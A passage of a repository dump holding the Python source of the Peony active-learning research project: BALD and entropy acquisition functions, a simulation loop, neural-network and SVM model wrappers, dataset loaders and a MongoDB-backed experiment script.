1], axis=0) / nn_dist_sample_num,\n ],\n base=BASE,\n axis=0,\n )\n\n return mutual_labels_prob_dist_entropy - expected_class_entropy\n\n\ndef bald_sampling(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n # instances are not used. They are given here in order to preserve unification\n\n prediction_bald = bald(labels)\n max_bald_indices: List[int] = []\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(prediction_bald)\n max_bald_indices.append(max_entropy_index)\n prediction_bald[max_entropy_index] = -np.inf\n\n return np.asarray(max_bald_indices)\n\n\ndef hac_bald_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n return hac_sampling(labels, batch_size, instances, bald_sampling, aggregate_sentence_embeds, criterion)\n\n\ndef power_bald(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n) -> np.ndarray:\n max_power_bald_indices: List[int] = []\n\n num_labels = len(labels[0])\n\n bald_score = (\n np.log(\n bald(labels),\n )\n + np.random.gumbel(scale=1 / GUMBEL_BETA, size=num_labels)\n )\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(bald_score)\n max_power_bald_indices.append(max_entropy_index)\n bald_score[max_entropy_index] = -np.inf\n\n return np.asarray(max_power_bald_indices)\n\n\ndef _get_cluster_sizes(key: int, cluster_tree: Dict[int, np.ndarray]) -> int:\n cluster_size = 0\n for leaf in cluster_tree[key]:\n if leaf in cluster_tree:\n cluster_size += _get_cluster_sizes(leaf, cluster_tree)\n else:\n cluster_size += 1\n\n return cluster_size\n"
},
{
"alpha_fraction": 0.6296107769012451,
"alphanum_fraction": 0.6296107769012451,
"avg_line_length": 40.16230392456055,
"blob_id": "0edbfad4b901abb74c22ab3ce64bfa44bc70acf0",
"content_id": "44357f8ac1b031be2cfd06a85ae29181d963352f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7862,
"license_type": "no_license",
"max_line_length": 201,
"num_lines": 191,
"path": "/Peony_project/Peony_box/active_learning_simulation/utils.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from Peony_box.src.peony_box_model import PeonyBoxModel\n\nfrom Peony_box.src.utils import k_fold_corss_validation, auc_metrics\n\nimport numpy as np\nimport multiprocessing as mp\nimport argparse\n\nfrom IPython.utils import io\nfrom tqdm import tqdm\n\n\ndef reset_validation_data(testing_instances, testing_labels, new_training_indices):\n new_training_indices = new_training_indices.tolist()\n training_instances = [testing_instances[index] for index in new_training_indices]\n training_labels = [testing_labels[index] for index in new_training_indices]\n testing_instances = [\n testing_instances[index]\n for index in range(len(testing_instances))\n if index not in new_training_indices\n ]\n testing_labels = [\n testing_labels[index] for index in range(len(testing_labels)) if index not in new_training_indices\n ]\n\n return training_instances, training_labels, testing_instances, testing_labels\n\n\ndef active_learning_simulation(\n transformator,\n acquisition_function,\n active_learning_loops,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n):\n\n # pool = mp.Pool(mp.cpu_count())\n\n # Repeat experiment for statistical validation\n # Return auc results for all runs and different active learning iteration\n\n # result = [pool.apply(active_learning_simulation_round, args = (transformator, acquisition_function, max_active_learning_iters, active_learning_step, model)) for _ in range(active_learning_loops)]\n\n # pool.close()\n\n return [\n active_learning_simulation_round(\n transformator,\n acquisition_function,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n )\n for _ in tqdm(range(active_learning_loops))\n ]\n\n\ndef active_learning_simulation_round(\n transformator,\n acquisition_function,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n):\n auc_active_learning_runs = []\n # Data preparation\n auc_active_learning = []\n\n training_instances = instances[:initial_training_data_size]\n training_labels = labels[:initial_training_data_size]\n\n testing_instances = instances[initial_training_data_size:]\n testing_labels = labels[initial_training_data_size:]\n\n # Active Learning Pipeline Run\n peony_model = PeonyBoxModel(\n transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n )\n with io.capture_output() as captured: # suppressing output\n # Fit model with very little set of training data\n if model == \"svm\":\n peony_model.svm_model.fit(training_instances, training_labels, transformation_needed)\n elif model == \"nn\":\n peony_model.dropout_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_sgld\":\n peony_model.bayesian_sgld_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_denfi\":\n peony_model.bayesian_denfi_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_dropout\":\n peony_model.bayesian_dropout_nn.fit(training_instances, training_labels, transformation_needed)\n else:\n peony_model.random_forest_model.fit(training_instances, training_labels, transformation_needed)\n\n # Start active learning loop\n for _ in tqdm(range(max_active_learning_iters)):\n with io.capture_output() as captured: # suppressing output\n\n # predict the dataset complement for choosing next training data\n if model == \"svm\":\n predicted = peony_model.svm_model.predict(testing_instances, transformation_needed)\n elif model == \"nn\":\n predicted = peony_model.dropout_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_sgld\":\n predicted = peony_model.bayesian_sgld_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_denfi\":\n predicted = peony_model.bayesian_denfi_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_dropout\":\n predicted = peony_model.bayesian_dropout_nn.predict(testing_instances, transformation_needed)\n else:\n predicted = peony_model.random_forest_model.predict(testing_instances, transformation_needed)\n\n if transformation_needed:\n labels_for_auc = transformator.transform_labels(testing_labels[:])\n else:\n labels_for_auc = list(testing_labels[:])\n auc_active_learning.append(auc_metrics([{\"true\": labels_for_auc, \"predicted\": predicted}]))\n\n # Get indices based on acquisition function\n if model == \"svm\":\n indices = peony_model.svm_model.get_learning_samples(testing_instances, transformation_needed)\n elif model == \"nn\":\n indices = peony_model.dropout_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_sgld\":\n indices = peony_model.bayesian_sgld_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_denfi\":\n indices = peony_model.bayesian_denfi_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_dropout\":\n indices = peony_model.bayesian_dropout_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n else:\n indices = peony_model.random_forest_model.get_learning_samples(\n testing_instances, transformation_needed\n )\n\n # Reset validation dataset (add training data, remove testing data)\n (\n training_instances,\n training_labels,\n testing_instances,\n testing_labels,\n ) = reset_validation_data(testing_instances, testing_labels, indices)\n\n # Add new learning samples to the model and retrain\n if model == \"svm\":\n peony_model.svm_model.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"nn\":\n peony_model.dropout_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_sgld\":\n peony_model.bayesian_sgld_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_denfi\":\n peony_model.bayesian_denfi_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_dropout\":\n peony_model.bayesian_dropout_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n else:\n peony_model.random_forest_model.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n\n return auc_active_learning\n"
},
{
"alpha_fraction": 0.6522532105445862,
"alphanum_fraction": 0.6598072648048401,
"avg_line_length": 44.16470718383789,
"blob_id": "745d80d5154179fbbc3f7dc4dcee54aaf6896755",
"content_id": "aa4f07ce9e9158cecc489f59f4b75b01dd50a0ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3839,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 85,
"path": "/Peony_project/Peony_box/src/peony_box_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom typing import Callable, Any, List, Dict, Any, Optional, Union\nfrom Peony_box.src.peony_adjusted_models.generalized_peony_box_model import (\n GeneralizedPeonyBoxModel,\n)\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\nfrom Peony_box.src.peony_adjusted_models.svm_model import PeonySVM\nfrom Peony_box.src.peony_adjusted_models.feed_forward_nn import PeonyFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.sgld_nn import PeonySGLDFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.denfi_nn import PeonyDENFIFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.dropout_nn import PeonyDropoutFeedForwardNN\n\n\nRAND_SAMPLES_RATIO = 0.7\nACQUISITION_FUNC_RATIO = 1\n\n\nclass PeonyBoxModel:\n def __init__(\n self,\n transformator: Transformator,\n acquisition_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,\n greedy_coef_decay: Optional[Callable[[int], float]] = None,\n active_learning_step: int = 1,\n number_of_classes_for_nn: int = 2,\n ):\n self.feed_forward_nn = GeneralizedPeonyBoxModel(\n model=PeonyFeedForwardNN(\n hidden_size=100,\n num_classes=number_of_classes_for_nn,\n rand_sample_ratio=1, # RAND_SAMPLES_RATIO,\n num_ensembles=1,\n ),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_sgld_nn = GeneralizedPeonyBoxModel(\n model=PeonySGLDFeedForwardNN(hidden_size=100, num_classes=number_of_classes_for_nn),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_denfi_nn = GeneralizedPeonyBoxModel(\n model=PeonyDENFIFeedForwardNN(\n hidden_size=100,\n num_classes=number_of_classes_for_nn,\n rand_sample_ratio=1,\n cold_start=False,\n ),\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.bayesian_dropout_nn = GeneralizedPeonyBoxModel(\n model=PeonyDropoutFeedForwardNN(\n hidden_size=100, num_classes=number_of_classes_for_nn, dropout_in_eval = True\n ), # 120 for LSTM\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n self.dropout_nn = GeneralizedPeonyBoxModel(\n model=PeonyDropoutFeedForwardNN(\n hidden_size=100, num_classes=number_of_classes_for_nn, cold_start=True, dropout_in_eval=False\n ), # 120 for LSTM\n transformator=transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n greedy_coef_decay=greedy_coef_decay,\n reset_after_adding_new_samples=False,\n ascquisition_func_ratio=ACQUISITION_FUNC_RATIO,\n )\n"
},
{
"alpha_fraction": 0.571535050868988,
"alphanum_fraction": 0.5737704634666443,
"avg_line_length": 33.410255432128906,
"blob_id": "ce152d8f8009fe48a23f18282ec8ed919a4993e4",
"content_id": "c7c897f58a12a1c1515b2e7a2039e8c9ea381659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1342,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 39,
"path": "/Peony_project/Peony_database/src/datasets/Newsgroups_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"4_newsgroups_dataset\"\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 2\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"text\"]}\n transormed_record[\"record\"][\"label\"] = record[\"label\"]\n transormed_record[\"record\"][\"metadata\"] = {\"language\": \"en\"}\n transormed_record[\"record\"][\"id\"] = create_hash([record[\"text\"]])\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n for folder in tqdm(path.iterdir()):\n if folder.stem != \".DS_Store\":\n for record in folder.iterdir():\n try:\n with open(record, \"r\", encoding=\"utf-8\") as f:\n data.append(\n {\"text\": f.read(), \"label\": f\"{folder.stem}{folder.suffix}\"}\n )\n except:\n logging.warning(\n \"Some fields are missing. This record was removed from dataset\"\n )\n return data\n"
},
{
"alpha_fraction": 0.6196439266204834,
"alphanum_fraction": 0.6360957622528076,
"avg_line_length": 26.893835067749023,
"blob_id": "e7a5148bcebaa2fed58f1fdec2391a91540102b3",
"content_id": "5b6fd54d10edce56cd07a4428cae99ce30d36d02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8145,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 292,
"path": "/Peony_project/Peony_box/active_learning_simulation/active_learning_simulation.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom Peony_box.active_learning_simulation.utils import active_learning_simulation\n\nfrom Peony_box.src.transformators.HuffPost_transformator import (\n RoBERTaWordEmbeddings as transformator,\n)\n\n# from Peony_database.src.datasets.Tweets_emotions_dataset import COLLECTION_NAME, COLLECTION_ID\nfrom Peony_database.src.datasets.fake_news_detection import COLLECTION_NAME, COLLECTION_ID\n# from Peony_database.src.datasets.gibberish import COLLECTION_NAME, COLLECTION_ID\n# from Peony_database.src.datasets.amazon_reviews import COLLECTION_NAME, COLLECTION_ID\n\nfrom Peony_box.src.acquisition_functions.functions import (\n entropy_sampling,\n batch_bald,\n hac_entropy_sampling,\n hac_bald_sampling,\n power_bald,\n bald_sampling,\n)\nfrom Peony_visualization.src.peony_visualization import visualize_two_auc_evolutions\n\nfrom sklearn.utils import shuffle\nimport numpy as np\n\n\nASC_FUNC_MAP = {\n \"random\": None,\n \"batch_bald\": batch_bald,\n \"power_bald\": power_bald,\n \"entropy_sampling\": entropy_sampling,\n \"bald_sampling\": bald_sampling,\n \"hac_entropy_sampling\": hac_entropy_sampling,\n \"hac_bald_sampling\": hac_bald_sampling,\n}\n\nALGORITHM_1 = \"bayesian_dropout\"\nALGORITHM_2 = \"nn\"\n\nENCODER = \"\"\nNOISE = \"\"\n\nASC_FUNC_1 = \"hac_entropy_sampling\"\nASC_FUNC_2 = \"hac_bald_sampling\"\nASC_FUNC_3 = \"random\"\nASC_FUNC_4 = \"entropy_sampling\"\nASC_FUNC_5 = \"bald_sampling\"\n\nLABELS = [0,1]#[0, 1]#[0,4] #[3, 5]\n\nLIMIT_1 = 2000\nLIMIT_2 = 2000\n\nACTIVE_LEARNING_LOOPS = 5\nACTIVE_LEARNING_STEP = 50\nACTIVE_LEARNING_SAMPLES = 20\nINITIAL_TRAINING_DATA_SIZE = 10\n\nMODEL_1 = f\"{ALGORITHM_1}_{ENCODER}_{NOISE}_{ASC_FUNC_1}_{ACTIVE_LEARNING_STEP}_{ACTIVE_LEARNING_SAMPLES}\"\nMODEL_2 = f\"{ALGORITHM_2}_{ENCODER}_{NOISE}_{ASC_FUNC_2}_{ACTIVE_LEARNING_STEP}_{ACTIVE_LEARNING_SAMPLES}\"\n\nCATEGORY_1 = \"Fake_news_detection_0\" #\"Tweet_emotion_0\" #\"GIBBERISH 1\"\nCATEGORY_2 = \"Fake_news_detection_1\" #\"Tweet_emotion_4\" #\"GIBBERISH 2\"\n\n\ndef main():\n\n api = MongoDb()\n\n records_1 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=LABELS[0],\n limit=LIMIT_1,\n )\n records_2 = api.get_record(\n collection_name=COLLECTION_NAME,\n collection_id=COLLECTION_ID,\n label=LABELS[1],\n limit=LIMIT_2,\n )\n\n # Define model specifications\n transformation_needed = False\n\n instances = records_1 + records_2\n labels = [sample[\"record\"][\"label\"] for sample in records_1 + records_2]\n\n instances_from_db, labels_from_db = shuffle(instances, labels, random_state=0)\n\n # HuffPostTransform = word_embed_transformator()\n\n HuffPostTransform = (\n transformator()\n ) # I'm using here not HuffPost transformator but I'm too lazy to change all variable names\n\n HuffPostTransform.fit(labels_from_db)\n\n if transformation_needed:\n instances = instances_from_db\n labels = labels_from_db\n else:\n instances = HuffPostTransform.transform_instances(instances_from_db)\n labels = HuffPostTransform.transform_labels(labels_from_db)\n\n # Get AUC results from an active learning simulation\n\n auc_learning_0 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_1],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_2,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n ALGORITHM_2,\n ASC_FUNC_1,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_0,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Zeros simulation is ready...\")\n \n auc_learning_1 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_1],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_1,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_1,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"First simulation is ready...\")\n\n auc_learning_2 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_2],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_2,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_2,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Second simulation is ready...\")\n\n auc_learning_3 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_3],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_3,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_3,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Third simulation is ready...\")\n\n auc_learning_4 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_4],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_4,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_4,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Fourth simulation is ready...\")\n\n auc_learning_5 = active_learning_simulation(\n HuffPostTransform,\n ASC_FUNC_MAP[ASC_FUNC_4],\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_SAMPLES,\n ACTIVE_LEARNING_STEP,\n ALGORITHM_1,\n instances,\n labels,\n INITIAL_TRAINING_DATA_SIZE,\n transformation_needed,\n )\n\n list_to_upload = [\n f\"{ALGORITHM_1}_d_0_2\",#_1_ens\",\n ASC_FUNC_5,\n ACTIVE_LEARNING_LOOPS,\n ACTIVE_LEARNING_STEP,\n ACTIVE_LEARNING_SAMPLES,\n INITIAL_TRAINING_DATA_SIZE,\n LIMIT_1 + LIMIT_2 - INITIAL_TRAINING_DATA_SIZE - ACTIVE_LEARNING_SAMPLES * ACTIVE_LEARNING_STEP,\n CATEGORY_1,\n CATEGORY_2,\n auc_learning_5,\n ]\n\n api.load_model_results(*list_to_upload)\n\n print(\"Fifth simulation is ready...\")\n\n #visualize_two_auc_evolutions(auc_learning_1, auc_learning_2)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.8003876209259033,
"alphanum_fraction": 0.8003876209259033,
"avg_line_length": 38.769229888916016,
"blob_id": "d6f20221b918c8d327c31c566eeea2538ad236f9",
"content_id": "12d1e360d1b96e0d1ed369f10fe717fa21def624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 13,
"path": "/Peony_project/Peony_visualization/README.MD",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Visualization Component\n\n## Visualization Component Description \n\n\n\nVisualization component is implemented with the usage of Dash by Plotly. This is a powerful visualization Python package that can be easily used for creating highly effective web pages with nice web interface. \n\n[Dash documentation can found here](https://plot.ly/dash/)\n\n## Docker + Dash\n\n//TODO Write documentation for this section"
},
{
"alpha_fraction": 0.6138743162155151,
"alphanum_fraction": 0.6138743162155151,
"avg_line_length": 22.15151596069336,
"blob_id": "f09066ca1c1f182e3aea7e6906ac9b9058b3f0d4",
"content_id": "b46d3ab1d1438ad3eb444f2cf56b2115cf1e62a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 33,
"path": "/Peony_project/Peony_box/src/transformators/generalized_transformator.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom typing import Callable, List, Dict\n\n\nclass Transformator:\n def __init__(\n self,\n embedding_dim: int,\n ):\n self.embedding_dim = embedding_dim\n\n self.encoding_mapper: Dict[str, int] = {}\n self.reverse_mapper: Dict[int, str] = {}\n\n def fit(self):\n pass\n\n def transform_instances(self):\n pass\n\n def transform_labels(self):\n transformed_data = [self.transform_label(sample) for sample in tqdm(data)]\n return np.asarray(transformed_data).ravel()\n\n def reset(self):\n pass\n\n def transform_label(self, sample: str) -> int:\n return self.encoding_mapper[sample]\n\n def transform_to_label(self, value: int) -> str:\n return self.reverse_mapper[value]\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 23.44444465637207,
"blob_id": "050c6baf6a29a0f24a66676f0cab7f90772aa6dd",
"content_id": "033e20133746384a656e020e91bef6595de86f35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/Peony_project/setup.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name=\"PeonyPackage\",\n version=\"1.0\",\n description=\"Pakcage for Peony Project usage\",\n packages=[\"PeonyPackage\"],\n package_dir={\"PeonyPackage\": \"PeonyPackage/\"},\n)\n"
},
{
"alpha_fraction": 0.5989916324615479,
"alphanum_fraction": 0.602065920829773,
"avg_line_length": 34.35652160644531,
"blob_id": "1ead18092c0e51e627b271c5a41f0a9ea5d5fd15",
"content_id": "a1fea57a41a53c7bf8251d324d418b06cb038535",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8132,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 230,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/generalized_peony_box_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nimport pymongo\nimport numpy as np\nimport torch\n\nfrom scipy.sparse import csc_matrix\nfrom scipy.sparse import vstack\nfrom sklearn.preprocessing import OneHotEncoder\n\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom typing import Callable, Any, List, Dict, Optional, Union, Tuple\n\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom Peony_box.src.acquisition_functions.functions import random_sampling\nfrom Peony_box.src.greedy_coef_decay_functions.functions import sigmoid_decay\n\n\nBATCH_SIZE = 32\n\n\ndef easy_colate(inputs) -> Tuple[torch.Tensor, torch.Tensor]:\n\n embeddings, labels = zip(*inputs)\n\n return (\n torch.stack([torch.mean(torch.stack(row, dim=0), dim=0) for row in embeddings], dim=0),\n torch.tensor(labels, dtype=torch.int64),\n )\n\n\ndef lstm_colate(inputs) -> List[Any]:\n\n embeddings, target = zip(*inputs)\n zipped = zip(\n [torch.stack(sentence, dim=0) for sentence in embeddings],\n target,\n list(range(len(embeddings))),\n [len(sentence) for sentence in embeddings],\n )\n\n embeddings, labels, indices, seq_lengths = zip(*sorted(zipped, key=lambda x: x[-1], reverse=True))\n\n indices = sorted(range(len(indices)), key=lambda k: indices[k])\n\n return [\n (\n pad_sequence(embeddings, batch_first=True),\n torch.tensor(seq_lengths, dtype=torch.long),\n torch.tensor(indices, dtype=torch.long),\n ),\n torch.tensor(labels, dtype=torch.int64),\n ]\n\n\nclass PeonyDataset(Dataset):\n def __init__(self, instances, labels):\n \"Initialization\"\n\n self.instances, self.labels = instances, labels\n self.features_size = self.instances[0][0].size()[0] if self.instances else 0\n\n def __len__(self):\n \"Denotes the total number of samples\"\n return len(self.instances)\n\n def __getitem__(self, index):\n \"Generates one sample of data\"\n\n return self.instances[index], self.labels[index]\n\n\nclass GeneralizedPeonyBoxModel:\n def __init__( # type: ignore\n self,\n model: Any,\n transformator: Transformator,\n active_learning_step: int,\n acquisition_function: Optional[Callable[[np.ndarray, int, np.ndarray], np.ndarray]],\n greedy_coef_decay: Optional[Callable[[int], float]],\n reset_after_adding_new_samples: bool = True,\n ascquisition_func_ratio: float = 1,\n collate: Callable[[List[Any]], Any] = easy_colate,\n ):\n self.model = model\n self.transformator = transformator\n self.active_learning_step = active_learning_step\n self.training_dataset: Dict[str, np.ndarray] = {}\n self.acquisition_function = acquisition_function\n self.epsilon_greedy_coef = 0.0\n self.active_learning_iteration = 0\n self.reset_after_adding_new_samples = reset_after_adding_new_samples\n self.ascquisition_func_ratio = 1 if active_learning_step == 1 else ascquisition_func_ratio\n self.collate = collate\n if greedy_coef_decay:\n self.greedy_coef_decay = greedy_coef_decay\n else:\n self.greedy_coef_decay = sigmoid_decay\n\n def fit(\n self,\n instances: Union[List[Dict[str, Any]], List[List[torch.Tensor]]],\n labels: Union[List[Any], List[int]],\n transformation_needed: bool = True,\n ) -> Optional[List[Any]]:\n\n fit_output: List[Any] = []\n\n if transformation_needed:\n print(\"transforming instances for model training...\")\n instances = self.transformator.transform_instances(instances)\n print(\"transforming labels for model training...\")\n labels = self.transformator.transform_labels(labels)\n\n if self.training_dataset == {}:\n self.training_dataset[\"training_instances\"] = instances\n self.training_dataset[\"training_labels\"] = labels\n else:\n self.training_dataset[\"training_instances\"] = (\n self.training_dataset[\"training_instances\"] + instances\n )\n self.training_dataset[\"training_labels\"] = self.training_dataset[\"training_labels\"] + labels\n\n training_dataloader = PeonyDataset(\n self.training_dataset[\"training_instances\"],\n self.training_dataset[\"training_labels\"],\n 